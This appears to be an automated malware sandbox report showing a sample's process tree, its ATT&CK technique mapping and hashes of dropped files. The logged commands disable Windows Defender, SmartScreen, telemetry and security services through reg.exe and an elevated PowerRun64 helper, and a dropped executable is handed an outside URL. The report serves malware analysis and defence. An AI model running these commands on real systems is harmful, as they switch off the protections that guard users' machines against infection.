C:\Windows\SysWOW64\reg.exereg add "HKLM\SOFTWARE\Microsoft\Windows Defender\Signature Updates" /v "FirstAuGracePeriod" /t reg_DWORD /d "0" /f3⤵
- System Location Discovery: System Language Discovery
PID:1448
-
-
C:\Windows\SysWOW64\reg.exereg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Signature Updates" /v "DisableUpdateOnStartupWithoutEngine" /t reg_DWORD /d 1 /f3⤵
- System Location Discovery: System Language Discovery
PID:4084
-
-
C:\Windows\SysWOW64\reg.exereg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Signature Updates" /v "ScheduleDay" /t reg_DWORD /d 8 /f3⤵
- System Location Discovery: System Language Discovery
PID:3140
-
-
C:\Windows\SysWOW64\reg.exereg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Signature Updates" /v "ScheduleTime" /t reg_DWORD /d 0 /f3⤵
- System Location Discovery: System Language Discovery
PID:2328
-
-
C:\Windows\SysWOW64\reg.exereg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Signature Updates" /v "SignatureUpdateCatchupInterval" /t reg_DWORD /d 0 /f3⤵
- System Location Discovery: System Language Discovery
PID:1368
-
-
C:\Windows\SysWOW64\reg.exereg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\SmartScreen" /v "ConfigureAppInstallControl" /t reg_SZ /d "Anywhere" /f3⤵PID:1920
-
-
C:\Windows\SysWOW64\reg.exereg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\SmartScreen" /v "ConfigureAppInstallControlEnabled" /t REG_DWORD /d 1 /f3⤵PID:1796
-
-
C:\Windows\SysWOW64\reg.exereg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\SpyNet" /v "DisableBlockAtFirstSeen" /t reg_DWORD /d "1" /f3⤵
- System Location Discovery: System Language Discovery
PID:4404
-
-
C:\Windows\SysWOW64\reg.exereg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\SpyNet" /v "SpynetReporting" /t reg_DWORD /d "0" /f3⤵PID:5020
-
-
C:\Windows\SysWOW64\reg.exereg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /v "SpyNetReportingLocation" /t reg_MULTI_SZ /d "0" /f3⤵
- System Location Discovery: System Language Discovery
PID:2864
-
-
C:\Windows\SysWOW64\reg.exereg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\SpyNet" /v "SubmitSamplesConsent" /t reg_DWORD /d "2" /f3⤵
- System Location Discovery: System Language Discovery
PID:2704
-
-
C:\Windows\SysWOW64\reg.exereg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /v "LocalSettingOverrideSpynetReporting" /t reg_DWORD /d 0 /f3⤵
- System Location Discovery: System Language Discovery
PID:1292
-
-
C:\Windows\SysWOW64\reg.exereg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender Security Center\Systray" /v "HideSystray" /t reg_DWORD /d "1" /f3⤵PID:808
-
-
C:\Windows\SysWOW64\reg.exereg add "HKLM\SOFTWARE\Microsoft\Windows Defender Security Center\Notifications" /v "DisableNotifications" /t reg_DWORD /d "1" /f3⤵
- Modifies Windows Defender notification settings
- System Location Discovery: System Language Discovery
PID:4980
-
-
C:\Windows\SysWOW64\reg.exereg add "HKLM\SOFTWARE\Microsoft\Windows Defender Security Center\Notifications" /v "DisableEnhancedNotifications" /t reg_DWORD /d "1" /f3⤵
- Modifies Windows Defender notification settings
- System Location Discovery: System Language Discovery
PID:504
-
-
C:\Windows\SysWOW64\reg.exereg add "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\StartupApproved\Run" /v "SecurityHealth" /t reg_BINARY /d "030000000000000000000000" /f3⤵
- System Location Discovery: System Language Discovery
PID:3504
-
-
C:\Users\Admin\AppData\Local\Temp\nsfD3BC.tmp\PowerRun64.exePowerRun64 /SW:0 C:\Windows\System32\reg.exe add "HKLM\SYSTEM\ControlSet001\Services\Sense" /v "Start" /t reg_DWORD /d "4" /f3⤵
- Executes dropped EXE
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:1324 -
C:\Users\Admin\AppData\Local\Temp\nsfD3BC.tmp\PowerRun64.exe"C:\Users\Admin\AppData\Local\Temp\nsfD3BC.tmp\PowerRun64.exe" /SW:0 C:\Windows\System32\reg.exe add "HKLM\SYSTEM\ControlSet001\Services\Sense" /v "Start" /t reg_DWORD /d "4" /f4⤵
- Executes dropped EXE
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:3528 -
C:\Users\Admin\AppData\Local\Temp\nsfD3BC.tmp\PowerRun64.exe"C:\Users\Admin\AppData\Local\Temp\nsfD3BC.tmp\PowerRun64.exe" /TI/ /SW:0 C:\Windows\System32\reg.exe add "HKLM\SYSTEM\ControlSet001\Services\Sense" /v "Start" /t reg_DWORD /d "4" /f5⤵
- Executes dropped EXE
- Modifies data under HKEY_USERS
PID:2824 -
C:\Windows\System32\reg.exe"C:\Windows\System32\reg.exe" add "HKLM\SYSTEM\ControlSet001\Services\Sense" /v "Start" /t reg_DWORD /d "4" /f6⤵PID:2084
-
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\nsfD3BC.tmp\PowerRun64.exePowerRun64 /SW:0 C:\Windows\System32\reg.exe add "HKLM\SYSTEM\ControlSet001\Services\WdBoot" /v "Start" /t reg_DWORD /d "4" /f3⤵
- Executes dropped EXE
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:4400 -
C:\Users\Admin\AppData\Local\Temp\nsfD3BC.tmp\PowerRun64.exe"C:\Users\Admin\AppData\Local\Temp\nsfD3BC.tmp\PowerRun64.exe" /SW:0 C:\Windows\System32\reg.exe add "HKLM\SYSTEM\ControlSet001\Services\WdBoot" /v "Start" /t reg_DWORD /d "4" /f4⤵
- Executes dropped EXE
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:4144 -
C:\Users\Admin\AppData\Local\Temp\nsfD3BC.tmp\PowerRun64.exe"C:\Users\Admin\AppData\Local\Temp\nsfD3BC.tmp\PowerRun64.exe" /TI/ /SW:0 C:\Windows\System32\reg.exe add "HKLM\SYSTEM\ControlSet001\Services\WdBoot" /v "Start" /t reg_DWORD /d "4" /f5⤵
- Executes dropped EXE
- Modifies data under HKEY_USERS
PID:2656 -
C:\Windows\System32\reg.exe"C:\Windows\System32\reg.exe" add "HKLM\SYSTEM\ControlSet001\Services\WdBoot" /v "Start" /t reg_DWORD /d "4" /f6⤵
- Modifies Security services
PID:876
-
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\nsfD3BC.tmp\PowerRun64.exePowerRun64 /SW:0 C:\Windows\System32\reg.exe add "HKLM\SYSTEM\ControlSet001\Services\WdFilter" /v "Start" /t reg_DWORD /d "4" /f3⤵
- Executes dropped EXE
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:3588 -
C:\Users\Admin\AppData\Local\Temp\nsfD3BC.tmp\PowerRun64.exe"C:\Users\Admin\AppData\Local\Temp\nsfD3BC.tmp\PowerRun64.exe" /SW:0 C:\Windows\System32\reg.exe add "HKLM\SYSTEM\ControlSet001\Services\WdFilter" /v "Start" /t reg_DWORD /d "4" /f4⤵
- Executes dropped EXE
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2592 -
C:\Users\Admin\AppData\Local\Temp\nsfD3BC.tmp\PowerRun64.exe"C:\Users\Admin\AppData\Local\Temp\nsfD3BC.tmp\PowerRun64.exe" /TI/ /SW:0 C:\Windows\System32\reg.exe add "HKLM\SYSTEM\ControlSet001\Services\WdFilter" /v "Start" /t reg_DWORD /d "4" /f5⤵
- Executes dropped EXE
- Modifies data under HKEY_USERS
PID:3428 -
C:\Windows\System32\reg.exe"C:\Windows\System32\reg.exe" add "HKLM\SYSTEM\ControlSet001\Services\WdFilter" /v "Start" /t reg_DWORD /d "4" /f6⤵
- Modifies Security services
PID:4236
-
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\nsfD3BC.tmp\PowerRun64.exePowerRun64 /SW:0 C:\Windows\System32\reg.exe add "HKLM\SYSTEM\ControlSet001\Services\WdNisDrv" /v "Start" /t reg_DWORD /d "4" /f3⤵
- Executes dropped EXE
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:5080 -
C:\Users\Admin\AppData\Local\Temp\nsfD3BC.tmp\PowerRun64.exe"C:\Users\Admin\AppData\Local\Temp\nsfD3BC.tmp\PowerRun64.exe" /SW:0 C:\Windows\System32\reg.exe add "HKLM\SYSTEM\ControlSet001\Services\WdNisDrv" /v "Start" /t reg_DWORD /d "4" /f4⤵
- Executes dropped EXE
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:5028 -
C:\Users\Admin\AppData\Local\Temp\nsfD3BC.tmp\PowerRun64.exe"C:\Users\Admin\AppData\Local\Temp\nsfD3BC.tmp\PowerRun64.exe" /TI/ /SW:0 C:\Windows\System32\reg.exe add "HKLM\SYSTEM\ControlSet001\Services\WdNisDrv" /v "Start" /t reg_DWORD /d "4" /f5⤵
- Executes dropped EXE
- Modifies data under HKEY_USERS
PID:1940 -
C:\Windows\System32\reg.exe"C:\Windows\System32\reg.exe" add "HKLM\SYSTEM\ControlSet001\Services\WdNisDrv" /v "Start" /t reg_DWORD /d "4" /f6⤵
- Modifies Security services
PID:3296
-
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\nsfD3BC.tmp\PowerRun64.exePowerRun64 /SW:0 C:\Windows\System32\reg.exe add "HKLM\SYSTEM\ControlSet001\Services\WdNisSvc" /v "Start" /t reg_DWORD /d "4" /f3⤵
- Executes dropped EXE
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2368 -
C:\Users\Admin\AppData\Local\Temp\nsfD3BC.tmp\PowerRun64.exe"C:\Users\Admin\AppData\Local\Temp\nsfD3BC.tmp\PowerRun64.exe" /SW:0 C:\Windows\System32\reg.exe add "HKLM\SYSTEM\ControlSet001\Services\WdNisSvc" /v "Start" /t reg_DWORD /d "4" /f4⤵
- Executes dropped EXE
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:3340 -
C:\Users\Admin\AppData\Local\Temp\nsfD3BC.tmp\PowerRun64.exe"C:\Users\Admin\AppData\Local\Temp\nsfD3BC.tmp\PowerRun64.exe" /TI/ /SW:0 C:\Windows\System32\reg.exe add "HKLM\SYSTEM\ControlSet001\Services\WdNisSvc" /v "Start" /t reg_DWORD /d "4" /f5⤵
- Executes dropped EXE
- Modifies data under HKEY_USERS
PID:2284 -
C:\Windows\System32\reg.exe"C:\Windows\System32\reg.exe" add "HKLM\SYSTEM\ControlSet001\Services\WdNisSvc" /v "Start" /t reg_DWORD /d "4" /f6⤵
- Modifies Security services
PID:5056
-
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\nsfD3BC.tmp\PowerRun64.exePowerRun64 /SW:0 C:\Windows\System32\reg.exe add "HKLM\SYSTEM\ControlSet001\Services\WinDefend" /v "Start" /t reg_DWORD /d "4" /f3⤵
- Executes dropped EXE
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:4368 -
C:\Users\Admin\AppData\Local\Temp\nsfD3BC.tmp\PowerRun64.exe"C:\Users\Admin\AppData\Local\Temp\nsfD3BC.tmp\PowerRun64.exe" /SW:0 C:\Windows\System32\reg.exe add "HKLM\SYSTEM\ControlSet001\Services\WinDefend" /v "Start" /t reg_DWORD /d "4" /f4⤵
- Executes dropped EXE
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:1028 -
C:\Users\Admin\AppData\Local\Temp\nsfD3BC.tmp\PowerRun64.exe"C:\Users\Admin\AppData\Local\Temp\nsfD3BC.tmp\PowerRun64.exe" /TI/ /SW:0 C:\Windows\System32\reg.exe add "HKLM\SYSTEM\ControlSet001\Services\WinDefend" /v "Start" /t reg_DWORD /d "4" /f5⤵
- Executes dropped EXE
- Modifies data under HKEY_USERS
PID:464 -
C:\Windows\System32\reg.exe"C:\Windows\System32\reg.exe" add "HKLM\SYSTEM\ControlSet001\Services\WinDefend" /v "Start" /t reg_DWORD /d "4" /f6⤵
- Modifies security service
PID:4204
-
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\nsfD3BC.tmp\PowerRun64.exePowerRun64 /SW:0 C:\Windows\System32\reg.exe add "HKLM\SYSTEM\ControlSet001\Services\wscsvc" /v "Start" /t reg_DWORD /d "4" /f3⤵
- Executes dropped EXE
- Suspicious behavior: EnumeratesProcesses
PID:3096 -
C:\Users\Admin\AppData\Local\Temp\nsfD3BC.tmp\PowerRun64.exe"C:\Users\Admin\AppData\Local\Temp\nsfD3BC.tmp\PowerRun64.exe" /SW:0 C:\Windows\System32\reg.exe add "HKLM\SYSTEM\ControlSet001\Services\wscsvc" /v "Start" /t reg_DWORD /d "4" /f4⤵
- Executes dropped EXE
PID:1616 -
C:\Users\Admin\AppData\Local\Temp\nsfD3BC.tmp\PowerRun64.exe"C:\Users\Admin\AppData\Local\Temp\nsfD3BC.tmp\PowerRun64.exe" /TI/ /SW:0 C:\Windows\System32\reg.exe add "HKLM\SYSTEM\ControlSet001\Services\wscsvc" /v "Start" /t reg_DWORD /d "4" /f5⤵
- Executes dropped EXE
- Modifies data under HKEY_USERS
PID:4312 -
C:\Windows\System32\reg.exe"C:\Windows\System32\reg.exe" add "HKLM\SYSTEM\ControlSet001\Services\wscsvc" /v "Start" /t reg_DWORD /d "4" /f6⤵
- Modifies security service
PID:3564
-
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\nsfD3BC.tmp\PowerRun64.exePowerRun64 /SW:0 C:\Windows\System32\reg.exe add "HKLM\SYSTEM\ControlSet001\Services\SecurityHealthService" /v "Start" /t reg_DWORD /d "4" /f3⤵
- Executes dropped EXE
PID:2572 -
C:\Users\Admin\AppData\Local\Temp\nsfD3BC.tmp\PowerRun64.exe"C:\Users\Admin\AppData\Local\Temp\nsfD3BC.tmp\PowerRun64.exe" /SW:0 C:\Windows\System32\reg.exe add "HKLM\SYSTEM\ControlSet001\Services\SecurityHealthService" /v "Start" /t reg_DWORD /d "4" /f4⤵
- Executes dropped EXE
PID:3724 -
C:\Users\Admin\AppData\Local\Temp\nsfD3BC.tmp\PowerRun64.exe"C:\Users\Admin\AppData\Local\Temp\nsfD3BC.tmp\PowerRun64.exe" /TI/ /SW:0 C:\Windows\System32\reg.exe add "HKLM\SYSTEM\ControlSet001\Services\SecurityHealthService" /v "Start" /t reg_DWORD /d "4" /f5⤵
- Executes dropped EXE
- Modifies data under HKEY_USERS
PID:4124 -
C:\Windows\System32\reg.exe"C:\Windows\System32\reg.exe" add "HKLM\SYSTEM\ControlSet001\Services\SecurityHealthService" /v "Start" /t reg_DWORD /d "4" /f6⤵
- Modifies Security services
PID:1304
-
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\nsfD3BC.tmp\PowerRun64.exePowerRun64 /SW:0 C:\Windows\System32\reg.exe add "HKLM\SYSTEM\CurrentControlSet\Services\Sense" /v "Start" /t reg_DWORD /d "4" /f3⤵
- Executes dropped EXE
PID:60 -
C:\Users\Admin\AppData\Local\Temp\nsfD3BC.tmp\PowerRun64.exe"C:\Users\Admin\AppData\Local\Temp\nsfD3BC.tmp\PowerRun64.exe" /SW:0 C:\Windows\System32\reg.exe add "HKLM\SYSTEM\CurrentControlSet\Services\Sense" /v "Start" /t reg_DWORD /d "4" /f4⤵
- Executes dropped EXE
PID:1268 -
C:\Users\Admin\AppData\Local\Temp\nsfD3BC.tmp\PowerRun64.exe"C:\Users\Admin\AppData\Local\Temp\nsfD3BC.tmp\PowerRun64.exe" /TI/ /SW:0 C:\Windows\System32\reg.exe add "HKLM\SYSTEM\CurrentControlSet\Services\Sense" /v "Start" /t reg_DWORD /d "4" /f5⤵
- Executes dropped EXE
- Modifies data under HKEY_USERS
PID:3136 -
C:\Windows\System32\reg.exe"C:\Windows\System32\reg.exe" add "HKLM\SYSTEM\CurrentControlSet\Services\Sense" /v "Start" /t reg_DWORD /d "4" /f6⤵PID:4528
-
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\nsfD3BC.tmp\PowerRun64.exePowerRun64 /SW:0 C:\Windows\System32\reg.exe add "HKLM\SYSTEM\CurrentControlSet\Services\WdBoot" /v "Start" /t reg_DWORD /d "4" /f3⤵
- Executes dropped EXE
PID:4104 -
C:\Users\Admin\AppData\Local\Temp\nsfD3BC.tmp\PowerRun64.exe"C:\Users\Admin\AppData\Local\Temp\nsfD3BC.tmp\PowerRun64.exe" /SW:0 C:\Windows\System32\reg.exe add "HKLM\SYSTEM\CurrentControlSet\Services\WdBoot" /v "Start" /t reg_DWORD /d "4" /f4⤵
- Executes dropped EXE
PID:3560 -
C:\Users\Admin\AppData\Local\Temp\nsfD3BC.tmp\PowerRun64.exe"C:\Users\Admin\AppData\Local\Temp\nsfD3BC.tmp\PowerRun64.exe" /TI/ /SW:0 C:\Windows\System32\reg.exe add "HKLM\SYSTEM\CurrentControlSet\Services\WdBoot" /v "Start" /t reg_DWORD /d "4" /f5⤵
- Executes dropped EXE
- Modifies data under HKEY_USERS
PID:3920 -
C:\Windows\System32\reg.exe"C:\Windows\System32\reg.exe" add "HKLM\SYSTEM\CurrentControlSet\Services\WdBoot" /v "Start" /t reg_DWORD /d "4" /f6⤵
- Modifies Security services
PID:4356
-
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\nsfD3BC.tmp\PowerRun64.exePowerRun64 /SW:0 C:\Windows\System32\reg.exe add "HKLM\SYSTEM\CurrentControlSet\Services\WdFilter" /v "Start" /t reg_DWORD /d "4" /f3⤵
- Executes dropped EXE
PID:3048 -
C:\Users\Admin\AppData\Local\Temp\nsfD3BC.tmp\PowerRun64.exe"C:\Users\Admin\AppData\Local\Temp\nsfD3BC.tmp\PowerRun64.exe" /SW:0 C:\Windows\System32\reg.exe add "HKLM\SYSTEM\CurrentControlSet\Services\WdFilter" /v "Start" /t reg_DWORD /d "4" /f4⤵
- Executes dropped EXE
PID:5084 -
C:\Users\Admin\AppData\Local\Temp\nsfD3BC.tmp\PowerRun64.exe"C:\Users\Admin\AppData\Local\Temp\nsfD3BC.tmp\PowerRun64.exe" /TI/ /SW:0 C:\Windows\System32\reg.exe add "HKLM\SYSTEM\CurrentControlSet\Services\WdFilter" /v "Start" /t reg_DWORD /d "4" /f5⤵
- Executes dropped EXE
- Modifies data under HKEY_USERS
PID:3084 -
C:\Windows\System32\reg.exe"C:\Windows\System32\reg.exe" add "HKLM\SYSTEM\CurrentControlSet\Services\WdFilter" /v "Start" /t reg_DWORD /d "4" /f6⤵
- Modifies Security services
PID:4084
-
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\nsfD3BC.tmp\PowerRun64.exePowerRun64 /SW:0 C:\Windows\System32\reg.exe add "HKLM\SYSTEM\CurrentControlSet\Services\WdNisDrv" /v "Start" /t reg_DWORD /d "4" /f3⤵
- Executes dropped EXE
PID:3428 -
C:\Users\Admin\AppData\Local\Temp\nsfD3BC.tmp\PowerRun64.exe"C:\Users\Admin\AppData\Local\Temp\nsfD3BC.tmp\PowerRun64.exe" /SW:0 C:\Windows\System32\reg.exe add "HKLM\SYSTEM\CurrentControlSet\Services\WdNisDrv" /v "Start" /t reg_DWORD /d "4" /f4⤵
- Executes dropped EXE
PID:2728 -
C:\Users\Admin\AppData\Local\Temp\nsfD3BC.tmp\PowerRun64.exe"C:\Users\Admin\AppData\Local\Temp\nsfD3BC.tmp\PowerRun64.exe" /TI/ /SW:0 C:\Windows\System32\reg.exe add "HKLM\SYSTEM\CurrentControlSet\Services\WdNisDrv" /v "Start" /t reg_DWORD /d "4" /f5⤵
- Executes dropped EXE
- Modifies data under HKEY_USERS
PID:1528 -
C:\Windows\System32\reg.exe"C:\Windows\System32\reg.exe" add "HKLM\SYSTEM\CurrentControlSet\Services\WdNisDrv" /v "Start" /t reg_DWORD /d "4" /f6⤵
- Modifies Security services
PID:4952
-
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\nsfD3BC.tmp\PowerRun64.exePowerRun64 /SW:0 C:\Windows\System32\reg.exe add "HKLM\SYSTEM\CurrentControlSet\Services\WdNisSvc" /v "Start" /t reg_DWORD /d "4" /f3⤵
- Executes dropped EXE
PID:2116 -
C:\Users\Admin\AppData\Local\Temp\nsfD3BC.tmp\PowerRun64.exe"C:\Users\Admin\AppData\Local\Temp\nsfD3BC.tmp\PowerRun64.exe" /SW:0 C:\Windows\System32\reg.exe add "HKLM\SYSTEM\CurrentControlSet\Services\WdNisSvc" /v "Start" /t reg_DWORD /d "4" /f4⤵
- Executes dropped EXE
PID:4776 -
C:\Users\Admin\AppData\Local\Temp\nsfD3BC.tmp\PowerRun64.exe"C:\Users\Admin\AppData\Local\Temp\nsfD3BC.tmp\PowerRun64.exe" /TI/ /SW:0 C:\Windows\System32\reg.exe add "HKLM\SYSTEM\CurrentControlSet\Services\WdNisSvc" /v "Start" /t reg_DWORD /d "4" /f5⤵
- Executes dropped EXE
- Modifies data under HKEY_USERS
PID:2680 -
C:\Windows\System32\reg.exe"C:\Windows\System32\reg.exe" add "HKLM\SYSTEM\CurrentControlSet\Services\WdNisSvc" /v "Start" /t reg_DWORD /d "4" /f6⤵
- Modifies Security services
PID:1492
-
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\nsfD3BC.tmp\PowerRun64.exePowerRun64 /SW:0 C:\Windows\System32\reg.exe add "HKLM\SYSTEM\CurrentControlSet\Services\WinDefend" /v "Start" /t reg_DWORD /d "4" /f3⤵
- Executes dropped EXE
PID:1292 -
C:\Users\Admin\AppData\Local\Temp\nsfD3BC.tmp\PowerRun64.exe"C:\Users\Admin\AppData\Local\Temp\nsfD3BC.tmp\PowerRun64.exe" /SW:0 C:\Windows\System32\reg.exe add "HKLM\SYSTEM\CurrentControlSet\Services\WinDefend" /v "Start" /t reg_DWORD /d "4" /f4⤵
- Executes dropped EXE
PID:4100 -
C:\Users\Admin\AppData\Local\Temp\nsfD3BC.tmp\PowerRun64.exe"C:\Users\Admin\AppData\Local\Temp\nsfD3BC.tmp\PowerRun64.exe" /TI/ /SW:0 C:\Windows\System32\reg.exe add "HKLM\SYSTEM\CurrentControlSet\Services\WinDefend" /v "Start" /t reg_DWORD /d "4" /f5⤵
- Executes dropped EXE
- Modifies data under HKEY_USERS
PID:1616 -
C:\Windows\System32\reg.exe"C:\Windows\System32\reg.exe" add "HKLM\SYSTEM\CurrentControlSet\Services\WinDefend" /v "Start" /t reg_DWORD /d "4" /f6⤵
- Modifies security service
PID:2556
-
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\nsfD3BC.tmp\PowerRun64.exePowerRun64 /SW:0 C:\Windows\System32\reg.exe add "HKLM\SYSTEM\CurrentControlSet\Services\wscsvc" /v "Start" /t reg_DWORD /d "4" /f3⤵
- Executes dropped EXE
PID:2000 -
C:\Users\Admin\AppData\Local\Temp\nsfD3BC.tmp\PowerRun64.exe"C:\Users\Admin\AppData\Local\Temp\nsfD3BC.tmp\PowerRun64.exe" /SW:0 C:\Windows\System32\reg.exe add "HKLM\SYSTEM\CurrentControlSet\Services\wscsvc" /v "Start" /t reg_DWORD /d "4" /f4⤵
- Executes dropped EXE
PID:2440 -
C:\Users\Admin\AppData\Local\Temp\nsfD3BC.tmp\PowerRun64.exe"C:\Users\Admin\AppData\Local\Temp\nsfD3BC.tmp\PowerRun64.exe" /TI/ /SW:0 C:\Windows\System32\reg.exe add "HKLM\SYSTEM\CurrentControlSet\Services\wscsvc" /v "Start" /t reg_DWORD /d "4" /f5⤵
- Executes dropped EXE
- Modifies data under HKEY_USERS
PID:2620 -
C:\Windows\System32\reg.exe"C:\Windows\System32\reg.exe" add "HKLM\SYSTEM\CurrentControlSet\Services\wscsvc" /v "Start" /t reg_DWORD /d "4" /f6⤵
- Modifies security service
PID:4144
-
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\nsfD3BC.tmp\PowerRun64.exePowerRun64 /SW:0 C:\Windows\System32\reg.exe add "HKLM\SYSTEM\CurrentControlSet\Services\SecurityHealthService" /v "Start" /t reg_DWORD /d "4" /f3⤵
- Executes dropped EXE
PID:2156 -
C:\Users\Admin\AppData\Local\Temp\nsfD3BC.tmp\PowerRun64.exe"C:\Users\Admin\AppData\Local\Temp\nsfD3BC.tmp\PowerRun64.exe" /SW:0 C:\Windows\System32\reg.exe add "HKLM\SYSTEM\CurrentControlSet\Services\SecurityHealthService" /v "Start" /t reg_DWORD /d "4" /f4⤵
- Executes dropped EXE
PID:3436 -
C:\Users\Admin\AppData\Local\Temp\nsfD3BC.tmp\PowerRun64.exe"C:\Users\Admin\AppData\Local\Temp\nsfD3BC.tmp\PowerRun64.exe" /TI/ /SW:0 C:\Windows\System32\reg.exe add "HKLM\SYSTEM\CurrentControlSet\Services\SecurityHealthService" /v "Start" /t reg_DWORD /d "4" /f5⤵
- Executes dropped EXE
- Modifies data under HKEY_USERS
PID:828 -
C:\Windows\System32\reg.exe"C:\Windows\System32\reg.exe" add "HKLM\SYSTEM\CurrentControlSet\Services\SecurityHealthService" /v "Start" /t reg_DWORD /d "4" /f6⤵
- Modifies Security services
PID:3684
-
-
-
-
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exePowershell -Command "Get-MpPreference"3⤵
- Command and Scripting Interpreter: PowerShell
- System Location Discovery: System Language Discovery
PID:3900
-
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exePowershell -Command "$wshell=New-Object -ComObject wscript.shell; $wshell.SendKeys('^a')3⤵
- Command and Scripting Interpreter: PowerShell
PID:3944
-
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exePowershell -Command "$wshell=New-Object -ComObject wscript.shell; $wshell.SendKeys('^c')3⤵
- Command and Scripting Interpreter: PowerShell
- System Location Discovery: System Language Discovery
PID:3420
-
-
-
C:\Users\Admin\AppData\Local\Temp\nsfD3BC.tmp\mbbyfatkrvotaiy.exe"C:\Users\Admin\AppData\Local\Temp\nsfD3BC.tmp\mbbyfatkrvotaiy.exe" "http://www.snowstormamer.click" "C:\Users\Admin\AppData\Local\Temp\nsfD3BC.tmp\5679"2⤵
- Executes dropped EXE
- System Location Discovery: System Language Discovery
PID:464
-
-
C:\Users\Admin\AppData\Local\Temp\nsfD3BC.tmp\win_version_csharp.exe"C:\Users\Admin\AppData\Local\Temp\nsfD3BC.tmp\win_version_csharp.exe"2⤵
- Executes dropped EXE
PID:3824
-
-
C:\Windows\SysWOW64\explorer.exeC:\Windows\system32\explorer.exe2⤵
- Deletes itself
- System Location Discovery: System Language Discovery
PID:3232
-
Network
MITRE ATT&CK Enterprise v15
Persistence
Create or Modify System Process
4Windows Service
4Event Triggered Execution
1Netsh Helper DLL
1Privilege Escalation
Create or Modify System Process
4Windows Service
4Event Triggered Execution
1Netsh Helper DLL
1Defense Evasion
Impair Defenses
5Disable or Modify System Firewall
1Disable or Modify Tools
3Modify Registry
5Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
16KB
MD5b2748baba8b055ef6840a67a562d1782
SHA13dacc6d2149474571af0c7e250dec1fd5a6962ac
SHA256256a7e37d86f1fd20b86f73c499d54a3968fcb832dba6f461ea773d85a165c5b
SHA512cb4fe686d0009a5e2f2c30c36bea497de5cc9e7660458c1672c8ddfb9794dbecd0af5ba1b9f3a91409b2b25158ebfe32f1c3bbf625b726b49023152f695f62d6
-
Filesize
60B
MD5d17fe0a3f47be24a6453e9ef58c94641
SHA16ab83620379fc69f80c0242105ddffd7d98d5d9d
SHA25696ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
SHA5125b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82
-
Filesize
25KB
MD5436c1bb98deeccecb73fad945f1dd3dc
SHA1774313ba911945589971bbc73498d81f060dabe6
SHA25605eae1691149cc66e458d5e5b4430bd3b938b278b8bdb2c887a13c9871004c51
SHA51266ea41b9b4a42f7c40d1ce5b6e82a6f03e8489648b912d96a81efa13d340d4d651078df7c1302c595ca83408e7208d1d79f02165dc27383952a9abe7f851c3e2
-
Filesize
601KB
MD51fb64ff73938f4a04e97e5e7bf3d618c
SHA1aa0f7db484d0c580533dec0e9964a59588c3632b
SHA2564efc87b7e585fcbe4eaed656d3dbadaec88beca7f92ca7f0089583b428a6b221
SHA512da6007847ffe724bd0b0abe000b0dd5596e2146f4c52c8fe541a2bf5f5f2f5893dccd53ef315206f46a9285ddbd766010b226873038ccac7981192d8c9937ece
-
Filesize
868KB
MD553406e9988306cbd4537677c5336aba4
SHA106becadb92a5fcca2529c0b93687c2a0c6d0d610
SHA256fa1afff978325f8818ce3a559d67a58297d9154674de7fd8eb03656d93104425
SHA5124f89da81b5a3800aa16ff33cc4a42dbb17d4c698a5e2983b88c32738decb57e3088a1da444ad0ec0d745c3c6b6b8b9b86d3f19909142f9e51f513748c0274a99
-
Filesize
982KB
MD59e8253f0a993e53b4809dbd74b335227
SHA1f6ba6f03c65c3996a258f58324a917463b2d6ff4
SHA256e434828818f81e6e1f5955e84caec08662bd154a80b24a71a2eda530d8b2f66a
SHA512404d67d59fcd767e65d86395b38d1a531465cee5bb3c5cf3d1205975ff76d27d477fe8cc3842b8134f17b61292d8e2ffba71134fe50a36afd60b189b027f5af0
-
Filesize
7KB
